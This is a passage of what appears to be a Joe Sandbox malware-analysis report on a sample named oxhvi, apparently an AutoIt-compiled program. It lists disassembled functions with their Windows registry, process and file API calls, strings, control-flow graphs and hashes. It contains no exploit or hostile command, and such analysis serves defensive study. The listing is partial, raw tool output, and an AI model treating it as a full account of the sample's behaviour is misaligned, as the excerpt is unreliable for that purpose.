                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                      • Opcode ID: fb7d8d982fc458a986983ad3cb38f36c721655dd99dba7fa2adc7d31c536f5f4
                                                                                                                                                      • Instruction ID: 457b69408d1123036f4ac6084e247cd2d16ae39c901e1f6a0d011ec0679129bd
                                                                                                                                                      • Opcode Fuzzy Hash: fb7d8d982fc458a986983ad3cb38f36c721655dd99dba7fa2adc7d31c536f5f4
                                                                                                                                                      • Instruction Fuzzy Hash: 3D314C711083419FD701EF64D885BAABFF8BF99350F04092DF581861A1EB719949CBA2
                                                                                                                                                      Function 0059E387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,00574686), ref: 0059E397
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 0059E3A6
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0059E3B7
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0059E3C3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2695905019-0
                                                                                                                                                      • Opcode ID: 317d0ecebafb1d28e4e32fa5ed08cb8926feffedd778da310d3bd68cc0c760bd
                                                                                                                                                      • Instruction ID: e7efb10ce71bfd9f35c3433df131fc2ff3543b30a698468966189c59ea36e5a5
                                                                                                                                                      • Opcode Fuzzy Hash: 317d0ecebafb1d28e4e32fa5ed08cb8926feffedd778da310d3bd68cc0c760bd
                                                                                                                                                      • Instruction Fuzzy Hash: EFF0A0314119106B8611A738EC0E8AA7BBCAE41335B104B25F836C20F0DBB0B99996A5
                                                                                                                                                      Function 00555078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,0055504E,?,005F98D8,0000000C,005551A5,?,00000002,00000000), ref: 00555099
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0055504E,?,005F98D8,0000000C,005551A5,?,00000002,00000000), ref: 005550A0
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 005550B2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                      • Opcode ID: 17f280fa7c24b5d7b13388c18f369ee8d8727b60dfead2f058f3e1645a1f16fc
                                                                                                                                                      • Instruction ID: e2a78b8b8f57cffdd3a18dc6881d60ce255415ead37cde8daddf2978a8d3e031
                                                                                                                                                      • Opcode Fuzzy Hash: 17f280fa7c24b5d7b13388c18f369ee8d8727b60dfead2f058f3e1645a1f16fc
                                                                                                                                                      • Instruction Fuzzy Hash: C1E09231401948AFCB216F54DD2DE583F79BB90782F044429F8058A572EB36DA4ADAA0
                                                                                                                                                      Function 0058E5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0058E60A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NameUser
                                                                                                                                                      • String ID: X64
                                                                                                                                                      • API String ID: 2645101109-893830106
                                                                                                                                                      • Opcode ID: 1d143fff5f882cdfdd2fa928425e3018b209887b4d394c47f75380a6fbcfb67e
                                                                                                                                                      • Instruction ID: 149618b626ef62519bbc524952083294933686aed9a24ad6f24366a782ed8374
                                                                                                                                                      • Opcode Fuzzy Hash: 1d143fff5f882cdfdd2fa928425e3018b209887b4d394c47f75380a6fbcfb67e
                                                                                                                                                      • Instruction Fuzzy Hash: CED0C9B480111DEACF90CB90EC8CDDD777CBB14304F100565F506F2000E77095499B20
                                                                                                                                                      Function 005BCD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 5bcd16-5bcd5a call 53bf07 * 3 7 5bcd5c-5bcd5f 0->7 8 5bcd65-5bcdd8 call 538e70 call 5bd6b1 call 5bd2f7 0->8 7->8 9 5bce64-5bce71 call 53e650 7->9 21 5bcdda-5bcde8 8->21 22 5bce08-5bce0d 8->22 15 5bd1ef-5bd212 call 53bd2c * 3 9->15 24 5bcdea 21->24 25 5bcded-5bcdfd 21->25 27 5bce0f-5bce24 RegConnectRegistryW 22->27 28 5bce7c 22->28 24->25 29 5bcdff 25->29 30 5bce02-5bce06 25->30 33 5bce76-5bce7a 27->33 34 5bce26-5bce43 call 537ab0 27->34 31 5bce80-5bceab RegCreateKeyExW 28->31 29->30 35 5bce61-5bce63 30->35 36 5bcf0e-5bcf13 31->36 37 5bcead-5bceca call 537ab0 31->37 33->31 47 5bce48-5bce58 34->47 48 5bce45 34->48 35->9 40 5bcf19-5bcf42 call 538e70 call 554db8 36->40 41 5bd1d6-5bd1e7 RegCloseKey 36->41 50 5bcecf-5bcede 37->50 51 5bcecc 37->51 59 5bcf96-5bcfb9 call 538e70 call 554db8 40->59 60 5bcf44-5bcf91 call 538e70 call 554cf3 call 538e70 * 2 40->60 41->15 44 5bd1e9-5bd1ed RegCloseKey 41->44 44->15 52 5bce5a 47->52 53 5bce5d 47->53 48->47 55 5bcee3-5bcef9 call 53e650 50->55 56 5bcee0 50->56 51->50 52->53 53->35 55->15 62 5bceff-5bcf09 RegCloseKey 55->62 56->55 71 5bcfbf-5bd019 call 538e70 call 554cf3 call 538e70 * 2 RegSetValueExW 59->71 72 5bd047-5bd06a call 538e70 call 554db8 59->72 83 5bd2bb-5bd2c7 RegSetValueExW 60->83 62->15 71->41 105 5bd01f-5bd042 call 537ab0 call 53e650 71->105 87 5bd070-5bd0d6 call 538e70 call 55019b call 538e70 call 53605e 72->87 88 5bd156-5bd179 call 538e70 call 554db8 72->88 83->41 86 5bd2cd-5bd2f2 call 537ab0 call 53e650 83->86 86->41 122 5bd0d8-5bd0dd 87->122 123 5bd0f6-5bd128 call 538e70 RegSetValueExW 87->123 106 5bd17f-5bd19f call 53c92d call 538e70 88->106 107 5bd215-5bd238 call 538e70 call 554db8 88->107 105->41 129 5bd1a1-5bd1b4 RegSetValueExW 106->129 130 5bd23a-5bd260 call 53c5df call 538e70 107->130 131 5bd265-5bd282 call 538e70 call 554db8 107->131 126 5bd0df-5bd0e1 122->126 127 5bd0e5-5bd0e8 122->127 140 5bd14a-5bd151 call 5501a4 123->140 141 5bd12a-5bd143 call 537ab0 call 53e650 123->141 126->127 127->122 133 5bd0ea-5bd0ec 127->133 129->41 136 5bd1b6-5bd1c0 call 537ab0 129->136 130->129 146 5bd1c5-5bd1cf call 53e650 131->146 154 5bd288-5bd2b9 call 5a276a call 538e70 call 5a27da 131->154 133->123 138 5bd0ee-5bd0f2 133->138 136->146 138->123 140->41 141->140 146->41 154->83
                                                                                                                                                      APIs
                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BCE1C
                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(?,?,00000000,005CDCD0,00000000,?,00000000,?,?), ref: 005BCEA3
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 005BCF03
                                                                                                                                                      • _wcslen.LIBCMT ref: 005BCF53
                                                                                                                                                      • _wcslen.LIBCMT ref: 005BCFCE
                                                                                                                                                      • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 005BD011
                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 005BD120
                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 005BD1AC
                                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 005BD1E0
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005BD1ED
                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 005BD2BF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                      • API String ID: 9721498-966354055
                                                                                                                                                      • Opcode ID: 8d54bc00413d6260e5597b7992d55b3fb2c5758282ee669f84f46b5f7d699c5b
                                                                                                                                                      • Instruction ID: f9a2a7d2d8d2c52f34a82b62e0c33c0608f40004af54aa12b5a63f88fcdb4a13
                                                                                                                                                      • Opcode Fuzzy Hash: 8d54bc00413d6260e5597b7992d55b3fb2c5758282ee669f84f46b5f7d699c5b
                                                                                                                                                      • Instruction Fuzzy Hash: 4D1247352046029FDB14DF18C885A6ABBF5BF88714F04885DF98A9B3A2DB31FD41CB91
                                                                                                                                                      Function 00533E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 163 533e15-533e45 call 55019b call 55016b 168 533e47-533e49 163->168 169 533e6e-533e80 call 55919b 163->169 170 533e4a-533e50 168->170 169->170 175 533e82-533e94 call 55919b 169->175 173 533e52-533e62 call 55015d call 5501a4 170->173 174 533e65-533e6b 170->174 173->174 181 574585-574587 175->181 182 533e9a-533eac call 55919b 175->182 181->170 186 533eb2-533ec4 call 55919b 182->186 187 57458c-57458f 182->187 190 574594-5745cb call 534154 call 534093 call 533fb8 call 554cf3 186->190 191 533eca-533edc call 55919b 186->191 187->170 223 5745cd-5745d8 190->223 224 574608-57460b 190->224 197 533ee2-533ef4 call 55919b 191->197 198 57462e-574633 191->198 205 574677-574688 call 59a316 197->205 206 533efa-533f0c call 55919b 197->206 198->170 200 574639-574655 call 54e2e5 198->200 212 574657-57465b 200->212 213 574662-57466a 200->213 219 5746dc-5746e2 205->219 220 57468a-5746d2 call 53b25f * 2 call 535379 call 533aa3 call 53bd2c * 2 205->220 221 533f26 206->221 222 533f0e-533f20 call 55919b 206->222 212->200 217 57465d 212->217 213->170 218 574670 213->218 217->170 218->205 225 5746f5-5746ff call 59a12a 219->225 240 574704-574706 220->240 268 5746d4-5746d7 220->268 230 533f29-533f2e call 53ad74 221->230 222->170 222->221 223->224 231 5745da-5745e1 223->231 226 5745f6-574603 call 5501a4 224->226 227 57460d-57461b 224->227 225->240 226->225 239 574620-574629 call 5501a4 227->239 242 533f33-533f35 230->242 231->226 236 5745e3-5745e7 231->236 236->226 243 5745e9-5745f4 236->243 239->170 240->170 246 5746e4-5746e9 242->246 247 533f3b-533f5e call 533fb8 call 534093 call 55919b 242->247 243->239 246->170 248 5746ef-5746f0 246->248 263 533fb0-533fb3 247->263 264 533f60-533f72 call 55919b 247->264 248->225 263->230 264->263 270 533f74-533f86 call 55919b 264->270 268->170 273 533f88-533f9a call 55919b 270->273 274 533f9c-533fa5 270->274 273->230 273->274 274->170 276 533fab 274->276 276->230
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                      • API String ID: 0-1645009161
                                                                                                                                                      • Opcode ID: 32717c806c4b37de84100d63316ccdeab19cbd58e555321a0b3eb7aa3910a0a8
                                                                                                                                                      • Instruction ID: 034e2650c6c7f9ebef0baee2da0b06a96351717a5ce5c32e58699d15396edf15
                                                                                                                                                      • Opcode Fuzzy Hash: 32717c806c4b37de84100d63316ccdeab19cbd58e555321a0b3eb7aa3910a0a8
                                                                                                                                                      • Instruction Fuzzy Hash: F9810471A40207BBDB10AF60DC5AFAE3F68BF45740F004025FD09AA192EB74DA15DBA1
                                                                                                                                                      Function 0053522E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00535539
                                                                                                                                                        • Part of subcall function 005351BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005351E1
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0053534B
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00574BD7
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00574C18
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00574C5A
                                                                                                                                                      • _wcslen.LIBCMT ref: 00574CC1
                                                                                                                                                      • _wcslen.LIBCMT ref: 00574CD0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                      • String ID: 8c$Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                      • API String ID: 98802146-153239285
                                                                                                                                                      • Opcode ID: 864e199d14f325155d747a3eba2d23fe2b5e449c09866800d5ff1c800ff0242b
                                                                                                                                                      • Instruction ID: 11838658764acc05d13c15be180266a0803a723b47063e6948bb346ca3803175
                                                                                                                                                      • Opcode Fuzzy Hash: 864e199d14f325155d747a3eba2d23fe2b5e449c09866800d5ff1c800ff0242b
                                                                                                                                                      • Instruction Fuzzy Hash: 0B717D71144351AEC708DF65E88995BBFEDFF88341F40682EF544C72A1EB719A48CB52
                                                                                                                                                      Function 00533696 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 510 533696-5336ab 511 53370b-53370d 510->511 512 5336ad-5336b0 510->512 511->512 515 53370f 511->515 513 5336b2-5336b9 512->513 514 533711 512->514 516 53378b-533793 PostQuitMessage 513->516 517 5336bf-5336c4 513->517 519 533717-53371c 514->519 520 573dce-573df6 call 532f24 call 54f1c6 514->520 518 5336f6-5336fe DefWindowProcW 515->518 525 53373f-533741 516->525 521 5336ca-5336ce 517->521 522 573e3b-573e4f call 59c80c 517->522 524 533704-53370a 518->524 526 533743-53376a SetTimer RegisterWindowMessageW 519->526 527 53371e-533721 519->527 556 573dfb-573e02 520->556 528 533795-53379f call 54fcbb 521->528 529 5336d4-5336d9 521->529 522->525 547 573e55 522->547 525->524 526->525 530 53376c-533777 CreatePopupMenu 526->530 533 533727-53373a KillTimer call 53388e call 53572c 527->533 534 573d6f-573d72 527->534 549 5337a4 528->549 536 573e20-573e27 529->536 537 5336df-5336e4 529->537 530->525 533->525 541 573d74-573d78 534->541 542 573daa-573dc9 MoveWindow 534->542 536->518 544 573e2d-573e36 call 591367 536->544 545 5336ea-5336f0 537->545 546 533779-533789 call 5337a6 537->546 550 573d7a-573d7d 541->550 551 573d99-573da5 SetFocus 541->551 542->525 544->518 545->518 545->556 546->525 547->518 549->525 550->545 552 573d83-573d94 call 532f24 550->552 551->525 552->525 556->518 560 573e08-573e1b call 53388e call 5338f2 556->560 560->518
                                                                                                                                                      APIs
                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00533690,?,?), ref: 005336FE
                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00533690,?,?), ref: 0053372A
                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0053374D
                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00533690,?,?), ref: 00533758
                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0053376C
                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0053378D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                      • String ID: 0$`$0$`$TaskbarCreated
                                                                                                                                                      • API String ID: 129472671-2757650357
                                                                                                                                                      • Opcode ID: b3b3a8d2f0feec23a9259aff99e6f832bda4579b78bcaf63c978f92e9e3d595f
                                                                                                                                                      • Instruction ID: 911d359a3bd370cab238f9ba5559435b30b1ed13fc3b5c0abb271b5cb29b5f7f
                                                                                                                                                      • Opcode Fuzzy Hash: b3b3a8d2f0feec23a9259aff99e6f832bda4579b78bcaf63c978f92e9e3d595f
                                                                                                                                                      • Instruction Fuzzy Hash: F54125B1144242BFDB281B78DC5EB7A3F6AFB40360F005229F516CA2A1DB759F01A761
                                                                                                                                                      Function 005335AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 005335DE
                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00533608
                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00533619
                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00533636
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00533646
                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 0053365C
                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0053366B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                      • Opcode ID: d42905b5ac6a9b7f2dc826a1d6a6cfa13955c8b631de5c10c3c9aaab16182bf6
                                                                                                                                                      • Instruction ID: f5a6950cc7c56c71a4e46eeb8fd661fc1305fa968615d56ec1f241dd9fe505dc
                                                                                                                                                      • Opcode Fuzzy Hash: d42905b5ac6a9b7f2dc826a1d6a6cfa13955c8b631de5c10c3c9aaab16182bf6
                                                                                                                                                      • Instruction Fuzzy Hash: 3A21E0B1941319AFDB00DFA5EC89B9EBBF5FB08700F00512AF611E62A0D7B45545DFA0
                                                                                                                                                      Function 005709FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 567 5709fb-570a2b call 5707cf 570 570a46-570a52 call 5655b1 567->570 571 570a2d-570a38 call 55f656 567->571 577 570a54-570a69 call 55f656 call 55f669 570->577 578 570a6b-570ab4 call 57073a 570->578 576 570a3a-570a41 call 55f669 571->576 587 570d1d-570d23 576->587 577->576 585 570ab6-570abf 578->585 586 570b21-570b2a GetFileType 578->586 589 570af6-570b1c GetLastError call 55f633 585->589 590 570ac1-570ac5 585->590 591 570b73-570b76 586->591 592 570b2c-570b5d GetLastError call 55f633 CloseHandle 586->592 589->576 590->589 596 570ac7-570af4 call 57073a 590->596 594 570b7f-570b85 591->594 595 570b78-570b7d 591->595 592->576 606 570b63-570b6e call 55f669 592->606 599 570b89-570bd7 call 5654fa 594->599 600 570b87 594->600 595->599 596->586 596->589 610 570be7-570c0b call 5704ed 599->610 611 570bd9-570be5 call 57094b 599->611 600->599 606->576 617 570c1e-570c61 610->617 618 570c0d 610->618 611->610 616 570c0f-570c19 call 568a3e 611->616 616->587 620 570c63-570c67 617->620 621 570c82-570c90 617->621 618->616 620->621 623 570c69-570c7d 620->623 624 570c96-570c9a 621->624 625 570d1b 621->625 623->621 624->625 626 570c9c-570ccf CloseHandle call 57073a 624->626 625->587 629 570d03-570d17 626->629 630 570cd1-570cfd GetLastError call 55f633 call 5656c3 626->630 629->625 630->629
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0057073A: CreateFileW.KERNELBASE(00000000,00000000,?,00570AA4,?,?,00000000,?,00570AA4,00000000,0000000C), ref: 00570757
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00570B0F
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00570B16
                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00570B22
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00570B2C
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00570B35
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00570B55
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00570C9F
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00570CD1
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00570CD8
                                                                                                                                                      Strings
